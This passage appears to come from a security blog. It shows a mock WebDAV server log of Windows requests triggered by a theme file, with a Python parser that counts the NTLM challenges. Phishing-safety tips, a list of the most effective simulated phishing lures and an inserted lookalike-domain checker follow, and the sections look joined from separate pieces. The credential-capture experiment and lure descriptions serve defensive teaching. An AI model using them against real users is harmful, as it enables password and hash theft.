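content_length: 0
host: themefile.test
reply<---- HTTP/1.1 401 Must authenticate
WWW-Authenticate: NTLM
Content-Length: 0
Connection: close
===Closed 2
===Connection 3 opened
...trying TLS
+++using TLS
request--> PROPFIND /nowwithwebdav.png HTTP/1.1
connection: Keep-Alive
user_agent: Microsoft-WebDAV-MiniRedir/10.0.19041
depth: 0
translate: f
content_length: 0
host: themefile.test
reply<---- HTTP/1.1 401 Must authenticate
WWW-Authenticate: NTLM
Content-Length: 0
Connection: close
===Closed 3
"""

REQUEST_RE = re.compile(r"^request--> (\S+) (\S+) HTTP/")
REPLY_RE = re.compile(r"^reply<---- HTTP/\d\.\d (\d{3})")


def parse_transcript(text):
    """One record per request: method, path, request headers, reply status
    and reply headers. Connection and TLS marker lines are skipped."""
    records = []
    current = None
    in_reply = False
    for line in text.splitlines():
        if line.startswith(("===", "...", "+++")):
            continue
        m = REQUEST_RE.match(line)
        if m:
            current = {"method": m.group(1), "path": m.group(2),
                       "headers": {}, "status": None, "reply_headers": {}}
            records.append(current)
            in_reply = False
            continue
        m = REPLY_RE.match(line)
        if m and current is not None:
            current["status"] = int(m.group(1))
            in_reply = True
            continue
        if current is not None and ":" in line:
            name, value = line.split(":", 1)
            # the mock server logs request headers with underscores; normalise both forms
            key = name.strip().lower().replace("_", "-")
            target = current["reply_headers"] if in_reply else current["headers"]
            target[key] = value.strip()
    return records


def summarize(records):
    """Per path: attempts, attempts carrying an Authorization header,
    401 challenges, and the authentication schemes the server offered."""
    summary = defaultdict(lambda: {"attempts": 0, "authenticated": 0,
                                   "challenged": 0, "schemes_offered": set()})
    for r in records:
        s = summary[r["path"]]
        s["attempts"] += 1
        if "authorization" in r["headers"]:
            s["authenticated"] += 1
        if r["status"] == 401:
            s["challenged"] += 1
            s["schemes_offered"].add(r["reply_headers"].get("www-authenticate", "?"))
    return {path: dict(s, schemes_offered=sorted(s["schemes_offered"]))
            for path, s in summary.items()}


if __name__ == "__main__":
    for path, s in summarize(parse_transcript(SAMPLE_TRANSCRIPT)).items():
        print(path, s)
```

Run against a full log of the article’s experiment, the summary for /nowwithwebdav.png would read 19 attempts, 0 authenticated, 19 challenged, which is precisely the “gave up every time” result without a single hash leaving the machine.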

What we can’t tell you is whether that’s down to a deliberate security restriction in the relevant part of the Settings app, to a default Windows NTLM setting that’s specific to the operating system version we were using (Windows 10 Enterprise 19041.450), to a limitation in our fake WebDAV server, or to something else entirely.

If you get further than we did with UNC paths, let us know in the comments below!

What to do?

Fortunately, this isn’t a critical security problem and should be easy to avoid, even if the crooks decided to start trying it out in earnest.

Here are our six tips to stay safe:

  • Read password prompts carefully. We agree with @bohops that the phishing popup we demonstrated above is more believable than seeing the same sort of login prompt directly in your browser, not least because the password box is convincingly headlined Settings. Nevertheless, the dialog does make it clear that the password request comes from a remote website, not from Windows, and that the login message comes from the site too, not from the operating system.
  • Avoid opening files you aren’t familiar with. It’s harder to spot that something unusual is going on if you aren’t familiar with what is usual.
  • Turn on the option to show file extensions. In File Explorer, click on the View item in the menu bar and then turn on the option File name extensions. If the Explorer window is narrow you may need to open the Show/hide tab first. Windows uses file extensions to decide how to handle files, and you should too, because the crooks love to use names like safe.txt.js or harmless.document.exe to throw you off the scent.
Turning on the Windows option to show file extensions.
  • Use a cybersecurity product that includes outbound web filtering. Sophos products, for example, don’t just scan incoming files for malware. After all, phishing attacks don’t rely on getting bad stuff into your network on purpose – they rely on you inadvertently letting good stuff out by mistake. Web filtering can keep you clear of rogue sites in the first place to keep you even further out of harm’s way.
  • Pick proper passwords. No, a complex password wouldn’t protect you against the HTTP Basic authentication trick shown above if you entered your own password anyway. But proper password choice will protect you if all an attacker can acquire is a strongly hashed version of your password, because the only way to recover the password is to try a lengthy list of likely passwords in the hope of finding one that matches the hash. Don’t be the first to fall!
  • Report unusual or suspicious content promptly to your security team. We’re betting that you’ve never, or at most very rarely, had anyone trying to foist a Theme file on you before. If an outsider tries to talk you into clicking, opening or approving something that you didn’t expect, don’t need and that you can’t see the point of… ask yourself, “Why would anyone do that?”

Phishing tricks – the Top Ten Treacheries of 2020

Sophos Phish Threat, in its own words, is a phishing attack simulator – it lets your IT department send realistic-looking fake phishes to your own staff so that if they do slip up, and click through…

…it’s not the crooks on the other end.

The crooks are testing you all the time, so you might as well test yourself and get one step ahead.

(Don’t panic – this isn’t a product infomercial, just some intriguing statistics that have emerged from users of the product so far this year.)

You can knit your own scam templates to construct your own fake phishes, but the product includes an extensive collection of customisable templates of its own that we update regularly.

The idea is to track the look and feel of real-world scams of all types, all the way from Scary Warnings of Imminent Doom to low-key messages saying little more than Please see the attached file.

History teaches us that email tricks can work surprisingly well with no text in the message body at all. One of the most prevalent email viruses of all time was HAPPY99, also known as Ska, which came out just over 20 years ago at the start of 1999. The email consisted only of an attachment – there was no subject line or message, so the only visible text in the email was the name of the attachment, HAPPY99.EXE. If you opened it, a New Year’s fireworks display appeared, though the animation was cover for the virus infecting your computer and then spreading to everyone you emailed thereafter. Ironically, the lack of any explanatory text at all meant that the email was much less suspicious than if the subject line had contained words in a language the recipient wouldn’t have expected. HAPPY99 as a filename all on its own had a timely and global appeal that almost certainly tricked millions more people into clicking it than if it had included any sort of marketing pitch.

Searching for the best worst

Well, the Phish Threat team asked themselves, “Which phishing templates give the best, or perhaps more accurately, the worst results?”

Are business email users more likely to fall for sticks or carrots? For threats or free offers? For explicit instructions or helpful suggestions? For “you must” or “you might like”?

The answers covered a broad range of phishing themes, but had a common thread: not one of them was a threat.

Most of them dealt with issues that were mundane and undramatic, while at the same time apparently being interesting, important, or both.

Nothing on this list was truly urgent or terrifying, and they all sounded likely and uncomplicated enough to be worth getting out of the way quickly.

The Top (or Bottom) Ten

  1. Rules of conduct. This purported to be a letter from HR outlining the company’s new Rules of Conduct. With global interest in increasing workplace diversity and reducing harassment, many companies are revising their employment guidelines. Most staff know that they’re supposed to read new guidelines, and that the HR team is obliged to chase them until they do, so clicking through here feels like a task you might as well get out of the way.
  2. Delayed year-end tax summary. This notified staff that their tax documentation wouldn’t arrive when they expected. Whether your country calls it a W-2, a P60, an IRP 5 or a Payment Summary, it’s one of those “necessary evils” that staff know they need, so they might as well find out how long the delay will be.
  3. Scheduled server maintenance. We were surprised that this was #3, because we rather cynically assumed that most people would be inclined to ignore IT messages of this sort, on the grounds that they couldn’t do anything about them anyway. In retrospect, however, now that so many people are working from home, we suspect that people like to know when outages are likely so they can schedule their own lives around them.
  4. Task assigned to you. In this message, the Phish Threat user gets to pick a project scheduling system that their own company uses (e.g. JIRA, Asana), so that the email doesn’t stand out as obviously bogus. Although that makes this a semi-targeted phish, you should assume that the business tools used in your company are widely known and easy for crooks to figure out, perhaps even automatically.
  5. New email system test. Who doesn’t want to be helpful, if all it takes is one quick click?
  6. Vacation policy update. Thanks to coronavirus lockdown and quarantine, booking and taking vacation leave is a tricky issue these days. Many companies are adapting their vacation policies accordingly – and who wants to risk missing out on time off?
  7. Car lights on. In this message, the building manager was apparently being cheerily helpful by reporting a car with its lights turned on. In real life, you might be suspicious that they posted a picture instead of just typing in the vehicle tag – but it occurred to us that many states and provinces in North America don’t supply front plates any more, so a photo taken from the front of the vehicle probably wouldn’t show the tag (registration number) anyway.
  8. Courier service failed delivery. This is a tried and tested trick that crooks have used for years. It’s especially believable these days thanks to the surge in home deliveries due to coronavirus. In fact, you may be expecting a delivery yourself right now – and in most cases it’s the vendor who decides which courier company to use, so you might not know who is doing the drop.
  9. Secure document. This purported to be a “secured document” from the HR team, giving a plausible reason for making you take an unusual route to view it. This trick is widely used by phishing crooks as a reason to convince you to enter passwords where you wouldn’t usually have to, or to adjust the security settings on your computer – ostensibly for the sake of improving security, but in reality to reduce it.
  10. Social Media Message. This one was a simulated LinkedIn notification promising that “You have unread messages from Joseph”. LinkedIn seems to be enjoying a surge in popularity right now, which is not surprising considering how many people have lost their jobs or had their working hours cut because of the coronavirus downturn. It’s tempting to click through, for fear of missing out, and scammers are happy to capitalise on that.

What to do?

  • Think before you click. Even if the message looks innocent at first sight, are there any scam giveaways that are obvious if you take the time to check? Examples include: spelling mistakes you doubt the sender would make, terminology that isn’t how your company would say it, software tools your company doesn’t use, and behaviour such as altering security settings you have explicitly been warned not to change.
  • Check with the sender if you aren’t sure. But never check by replying to the email to ask if it’s genuine – you will get the answer “Yes” either way, because a legitimate sender would tell the truth but a crook would lie. Use a corporate directory accessible via trustworthy means to find a way to get in touch with a colleague you think has been impersonated.
  • Take a careful look at links before you click. Many phishing emails contain text and images that are error-free. But the crooks often have to rely on temporary cloud servers or hacked websites to host their phishing web pages, and the subterfuge often shows up in the domain name they want you to visit. Don’t be tricked because a server name looks “close enough” – crooks often register near-miss names such as yourcompanny, yourc0mpany (zero for the letter O) or yourcompany-site, using misspellings, similar-looking characters or added text.
  • Report suspicious emails to your security team. Get in the habit of doing this every time, even though it feels like a thankless task. Phishing crooks don’t send their emails just to one person at a time, so if you’re the first in the company to spot a new scam, an early warning will let your IT department warn everyone else who might have received it too.
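The “close enough” domain names in the third tip lend themselves to a simple automated check, which a security team could run over the links in reported emails before anyone clicks. What follows is an added Python example, not part of the original article: it pulls the hostname out of a link, compares it with an assumed company domain (`yourcompany.com`, a placeholder) and reports whether it is genuine, a homoglyph lookalike (yourc0mpany), a near-miss misspelling (yourcompanny), the company name with text added (yourcompany-site), or unrelated. Taking the registrable domain as the last two labels is a deliberate simplification that ignores public suffixes such as co.uk, and the homoglyph table is a short constructed list, not an exhaustive one.

```python
from urllib.parse import urlsplit

# Substitutions undone before comparing names: characters and pairs that read
# like other letters at a glance. Constructed, deliberately short list.
HOMOGLYPHS = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"))


def normalize(label):
    """Fold common look-alike characters so yourc0mpany compares equal to yourcompany."""
    s = label.lower()
    for fake, real in HOMOGLYPHS:
        s = s.replace(fake, real)
    return s


def levenshtein(a, b):
    """Classic edit distance (insert, delete, substitute); fine for short labels."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess_link(url, company_domain="yourcompany.com"):
    """Return (verdict, hostname). company_domain is an assumed placeholder.
    The registrable domain is taken as the last two labels, a simplification
    that ignores public suffixes such as co.uk."""
    host = (urlsplit(url).hostname or "").rstrip(".")
    if not host:
        return ("invalid", host)
    labels = host.lower().split(".")
    registrable = ".".join(labels[-2:])
    if registrable == company_domain.lower():
        return ("genuine", host)          # the domain itself or one of its subdomains
    company_name = company_domain.lower().split(".")[0]
    name = labels[-2] if len(labels) >= 2 else labels[0]
    if normalize(name) == normalize(company_name):
        return ("lookalike-homoglyph", host)
    # a threshold of 2 suits a name this long; short company names need a tighter limit
    if levenshtein(name, company_name) <= 2:
        return ("lookalike-misspelling", host)
    # catches yourcompany-site.com and yourcompany.com.evil.test alike
    if any(company_name in label for label in labels):
        return ("lookalike-added-text", host)
    return ("unrelated", host)


if __name__ == "__main__":
    for link in ("https://login.yourcompany.com/reset", "https://yourcompanny.com/",
                 "http://yourc0mpany.com/", "https://yourcompany-site.com/",
                 "https://yourcompany.com.evil.test/", "https://example.org/"):
        print(assess_link(link))
```

The checks are ordered from most to least specific so that a homoglyph name is not reported merely as a misspelling; anything other than “genuine” or “unrelated” is a good candidate for the “check with the sender” step, using a directory rather than the email itself.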

By the way, if you’re in the security team and you don’t have a quick and easy way for your staff to report potential cybersecurity problems such as suspicious phone calls or dodgy emails, why not set up an easy-to-remember internal email address today, and get used to monitoring it?

It doesn’t take much encouragement to turn your entire workforce into the eyes and ears of the security team.

After all, when it comes to cybersecurity, an injury to one really is an injury to all.
